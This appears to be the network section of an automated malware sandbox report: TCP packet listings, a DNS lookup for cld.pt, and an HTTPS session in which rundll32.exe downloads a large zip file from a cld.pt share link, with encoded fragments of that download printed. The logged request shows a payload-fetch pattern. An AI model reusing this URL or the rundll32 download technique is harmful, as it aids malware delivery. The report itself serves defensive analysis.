                  Apr 27, 2024 03:34:03.589354992 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:03.589427948 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:03.589468956 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:03.589515924 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:03.589515924 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:03.589515924 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:03.589529991 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:03.589598894 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:03.777615070 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:03.777858019 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:03.965517044 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:03.965560913 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:03.965708017 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:03.965718031 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:03.965867996 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:03.965995073 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:03.966101885 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:03.966782093 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:03.966947079 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.153683901 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.153801918 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.154437065 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.154515982 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.154553890 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.154618979 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.342148066 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.342354059 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.530304909 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.530378103 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.530492067 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.530503035 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.530621052 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.530797005 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.530960083 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.718676090 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.718785048 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.718875885 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.718943119 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.719167948 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.719228029 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.719332933 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.719396114 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.909363985 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.909562111 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:04.909672976 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:04.909744024 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.098229885 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.098303080 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.098355055 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.098366976 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.098400116 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.098407984 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.098529100 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.098576069 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.141277075 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.141519070 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.287698984 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.287875891 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.287975073 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.287986040 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.288223028 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.288266897 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.288341999 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.288491011 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.288572073 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.476025105 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.476097107 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.476469040 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.476514101 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.476524115 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.476550102 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.476572037 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.476591110 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.524391890 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.524555922 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.664890051 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.664948940 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.664993048 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.665036917 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.666033983 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.666079044 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.666085005 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.666091919 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.666114092 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.666136026 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.853055954 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.853121996 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.853137016 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.853146076 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.853157043 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.853178024 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:05.854091883 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:05.854135036 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.041326046 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.041383982 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.041407108 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.041435957 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.041435957 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.041446924 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.041465044 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.041551113 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.042257071 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.042323112 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.042356968 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.042407990 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.042476892 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.042531013 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.042745113 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.042798996 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.083930969 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.084002972 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.229026079 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.229104042 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.229118109 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.229126930 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.229166985 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.229166985 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.229846001 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.229897022 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.503531933 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.503542900 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.503601074 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.503652096 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.503664017 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.503853083 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.607517958 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.607593060 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.607649088 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.607743025 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.607765913 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.607865095 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.607868910 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.607882023 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.607920885 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.607924938 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.607924938 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.607935905 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.607952118 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.607979059 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.607985020 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.608032942 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.608036041 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.608036041 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.608041048 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.608071089 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.692704916 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.692797899 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.693437099 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.693487883 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.693552017 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.693552017 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.693558931 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.693710089 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.693780899 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.693780899 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.693804026 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.693878889 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.797029018 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.797151089 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:06.883019924 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:06.883084059 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.072807074 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.072875977 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.073873043 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.073903084 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.073945999 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.073956013 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.074002981 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.074002981 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.261068106 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.261109114 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.261137009 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.261147022 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.261197090 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.261197090 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.261629105 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.261687994 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.261723042 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.261753082 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.261785030 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.261785030 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.261792898 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.261853933 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.261982918 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.262036085 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.262381077 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.262475967 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.262707949 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.262814045 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.448976994 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.449048996 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.449733019 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.449810028 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.450181961 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.450254917 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.637974024 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.638025045 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.638055086 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.638062000 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.638118029 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.638118029 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.638370991 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.638449907 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.639453888 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.639484882 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.639509916 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.639518023 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.639542103 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.639636040 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.680784941 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.680856943 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.680999994 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.681061029 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.827568054 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.827622890 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.827647924 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.827656984 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.827682018 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.827704906 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.827789068 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.827889919 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.868336916 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.868406057 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:07.868438959 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:07.868506908 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:08.016307116 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:08.016401052 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:08.016602993 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:08.016665936 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:08.055829048 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:08.055948973 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:08.056824923 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:08.056875944 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:08.056889057 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:08.056898117 CEST44349735213.13.26.154192.168.2.4
                  Apr 27, 2024 03:34:08.056940079 CEST49735443192.168.2.4213.13.26.154
                  Apr 27, 2024 03:34:08.056940079 CEST49735443192.168.2.4213.13.26.154

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Apr 27, 2024 03:32:00.497132063 CEST5544953192.168.2.41.1.1.1
                  Apr 27, 2024 03:32:01.258970976 CEST53554491.1.1.1192.168.2.4

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Apr 27, 2024 03:32:00.497132063 CEST192.168.2.41.1.1.10xd982Standard query (0)cld.ptA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Apr 27, 2024 03:32:01.258970976 CEST1.1.1.1192.168.2.40xd982No error (0)cld.pt213.13.26.154A (IP address)IN (0x0001)false
                  Apr 27, 2024 03:32:01.258970976 CEST1.1.1.1192.168.2.40xd982No error (0)cld.pt213.13.26.152A (IP address)IN (0x0001)false
                  Apr 27, 2024 03:32:01.258970976 CEST1.1.1.1192.168.2.40xd982No error (0)cld.pt213.13.26.153A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • cld.pt

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449735213.13.26.1544437312C:\Windows\SysWOW64\rundll32.exe
                  TimestampBytes transferredDirectionData
                  2024-04-27 01:32:01 UTC148OUTGET /dl/download/5a0d8a94-236d-4a83-b1ba-16bf33ac459c/0304PT.zip?user-English%20(United%20Kingdom) HTTP/1.1
                  User-Agent: rundll32
                  Host: cld.pt
                  2024-04-27 01:32:02 UTC423INHTTP/1.1 200 OK
                  Server: nginx
                  Content-Type: application/zip
                  Content-Length: 42608370
                  Connection: close
                  Content-Language: pt
                  Content-Disposition: inline
                  Accept-Ranges: bytes
                  Vary: Accept-Language, Cookie
                  ETag: "6zH-I1UUnJmfMr_3jZICXgNQxq8ukZ9rqalMdWQb2UMEQPuUDV5BzlaVIfHM5liS9opiByva9zrVu5JLHFbV5Q"
                  Date: Sat, 27 Apr 2024 01:32:02 GMT
                  Access-Control-Allow-Origin: *
                  Access-Control-Allow-Methods: GET, OPTIONS
                  2024-04-27 01:32:02 UTC3764INData Raw: 42 6d 43 57 7a 6e 45 79 6d 63 7a 75 38 37 69 55 69 38 6e 6a 44 4c 55 72 6d 45 76 2f 2f 2f 39 76 2f 76 2f 32 2f 2f 2f 2f 6d 34 6b 79 53 75 44 6b 41 56 37 31 49 4e 79 65 69 61 69 72 61 52 43 4b 51 48 76 34 6c 69 33 77 46 70 2b 6b 0d 0a 37 46 38 71 2b 48 76 61 54 79 63 78 55 71 71 6d 66 76 71 4f 39 4d 66 64 55 30 56 73 6b 65 75 7a 69 2f 73 59 37 75 61 2f 45 36 6b 6a 39 73 34 7a 74 4a 78 41 43 6a 53 6e 4b 59 6d 38 39 5a 57 39 73 42 42 51 53 31 72 45 47 71 57 54 0d 0a 36 6c 50 6c 52 4a 59 58 37 35 57 4f 42 39 64 75 34 6f 39 64 6e 64 4d 74 42 49 4b 76 36 61 37 78 38 5a 4d 78 52 6b 68 45 4c 48 66 7a 72 41 79 63 67 42 71 70 65 67 51 52 77 68 68 68 68 4a 69 53 63 6c 51 57 33 50 42 61 32 30 46 6b 0d 0a 54 34 33 6a 32 44 39 67 6d 6f 34 6a 6b 58 48 4b 77 49 67 55 69
                  Data Ascii: BmCWznEymczu87iUi8njDLUrmEv///9v/v/2////m4kySuDkAV71INyeiairaRCKQHv4li3wFp+k7F8q+HvaTycxUqqmfvqO9MfdU0Vskeuzi/sY7ua/E6kj9s4ztJxACjSnKYm89ZW9sBBQS1rEGqWT6lPlRJYX75WOB9du4o9dndMtBIKv6a7x8ZMxRkhELHfzrAycgBqpegQRwhhhhJiSclQW3PBa20FkT43j2D9gmo4jkXHKwIgUi
                  2024-04-27 01:32:02 UTC4096INData Raw: 59 61 51 35 4b 68 4a 51 38 59 6c 71 43 32 74 4b 43 7a 5a 33 48 69 65 77 54 76 48 6e 63 56 70 42 73 62 79 46 2f 6c 49 67 6b 64 4d 59 4b 39 52 49 73 39 65 50 46 47 6f 39 0d 0a 66 32 72 2b 67 62 74 73 72 39 62 72 7a 69 54 66 4d 6c 64 2b 36 4a 49 37 6b 30 36 76 55 47 30 35 41 38 4d 57 75 33 53 67 51 46 36 30 6b 42 75 6d 6c 6e 69 69 63 77 61 42 72 53 53 45 64 63 74 42 70 43 62 4a 32 49 72 43 43 6f 72 51 0d 0a 45 7a 42 66 76 58 59 57 67 42 4d 67 6e 67 51 38 6e 33 48 75 68 55 61 45 71 38 39 34 49 45 68 70 71 33 48 64 35 6a 32 71 58 4d 4c 53 57 37 4b 4d 79 78 6e 50 36 51 79 77 6d 69 41 50 47 57 61 35 45 76 41 47 35 4a 71 35 2f 62 6f 35 0d 0a 32 5a 51 76 75 58 6b 71 36 41 69 31 72 64 54 69 39 5a 68 48 69 76 4c 32 2f 71 30 6e 5a 41 76 78 62 78 42 38 6a 4f 34 66 6c
                  Data Ascii: YaQ5KhJQ8YlqC2tKCzZ3HiewTvHncVpBsbyF/lIgkdMYK9RIs9ePFGo9f2r+gbtsr9brziTfMld+6JI7k06vUG05A8MWu3SgQF60kBumlniicwaBrSSEdctBpCbJ2IrCCorQEzBfvXYWgBMgngQ8n3HuhUaEq894IEhpq3Hd5j2qXMLSW7KMyxnP6QywmiAPGWa5EvAG5Jq5/bo52ZQvuXkq6Ai1rdTi9ZhHivL2/q0nZAvxbxB8jO4fl
                  2024-04-27 01:32:02 UTC4096INData Raw: 42 4d 46 38 50 39 67 46 72 70 58 45 38 5a 5a 43 0d 0a 6b 53 4e 45 72 63 39 53 45 6d 41 5a 74 77 42 6a 54 35 73 74 68 64 65 78 68 5a 66 69 6c 38 61 51 6d 75 7a 6e 30 48 66 5a 4e 4a 36 42 6e 38 76 4c 33 66 4a 70 6d 66 53 4d 74 78 79 45 31 77 77 4e 51 44 79 54 30 68 32 6b 45 42 31 31 0d 0a 69 67 30 50 41 68 46 49 76 31 55 5a 61 6c 55 4c 43 63 36 6a 6b 43 55 77 69 64 4f 67 6e 55 38 47 61 34 39 4a 46 47 63 63 30 50 63 41 38 4f 64 4b 72 62 71 6b 50 54 62 51 66 79 69 55 57 38 63 44 42 46 6c 69 6f 35 68 64 32 34 32 55 0d 0a 4b 59 55 32 51 4a 36 43 68 30 41 72 75 64 31 74 31 4c 46 6e 66 6e 4a 5a 78 33 37 77 50 35 7a 77 6d 35 33 4e 6a 36 46 2f 50 47 43 76 4d 2f 52 73 32 61 6f 58 33 37 66 58 4b 54 6d 41 59 78 69 53 71 43 32 67 49 4e 46 6a 38 57 70 6e 0d 0a 65 6c 53
                  Data Ascii: BMF8P9gFrpXE8ZZCkSNErc9SEmAZtwBjT5sthdexhZfil8aQmuzn0HfZNJ6Bn8vL3fJpmfSMtxyE1wwNQDyT0h2kEB11ig0PAhFIv1UZalULCc6jkCUwidOgnU8Ga49JFGcc0PcA8OdKrbqkPTbQfyiUW8cDBFlio5hd242UKYU2QJ6Ch0Arud1t1LFnfnJZx37wP5zwm53Nj6F/PGCvM/Rs2aoX37fXKTmAYxiSqC2gINFj8WpnelS
                  2024-04-27 01:32:02 UTC4096INData Raw: 45 58 51 42 5a 36 41 62 38 38 56 33 6a 6f 33 6e 51 79 32 31 30 55 6c 4d 6e 33 45 46 48 67 38 32 71 34 43 43 67 58 2b 4f 70 63 52 6a 43 48 46 5a 76 56 6f 2b 52 70 0d 0a 6b 36 4e 79 51 6b 6a 67 73 47 65 66 62 68 74 71 75 62 49 51 2f 4e 66 7a 47 31 38 6c 43 51 6d 6b 47 6f 79 59 78 2b 47 2f 63 4e 34 62 43 47 78 5a 36 45 69 2b 43 46 35 4e 53 4d 53 38 54 6f 78 4e 47 54 39 72 6d 57 47 53 64 61 54 2f 0d 0a 50 56 51 2f 64 6c 56 6b 4f 54 36 72 7a 76 49 51 56 42 38 4b 55 4b 2b 43 67 47 61 44 34 42 58 4c 76 61 4a 44 39 70 41 70 49 47 6d 76 71 79 7a 68 30 31 74 4a 67 70 56 6f 4f 52 77 65 6d 7a 6f 34 77 66 63 44 39 4c 73 48 46 4d 57 38 0d 0a 2f 62 77 6e 71 50 35 7a 6d 78 49 50 4f 65 4b 4e 33 70 70 38 50 64 48 6a 37 76 63 50 6b 50 37 54 32 2b 76 32 64 71 38 47 79 47 4d
                  Data Ascii: EXQBZ6Ab88V3jo3nQy210UlMn3EFHg82q4CCgX+OpcRjCHFZvVo+Rpk6NyQkjgsGefbhtqubIQ/NfzG18lCQmkGoyYx+G/cN4bCGxZ6Ei+CF5NSMS8ToxNGT9rmWGSdaT/PVQ/dlVkOT6rzvIQVB8KUK+CgGaD4BXLvaJD9pApIGmvqyzh01tJgpVoORwemzo4wfcD9LsHFMW8/bwnqP5zmxIPOeKN3pp8PdHj7vcPkP7T2+v2dq8GyGM
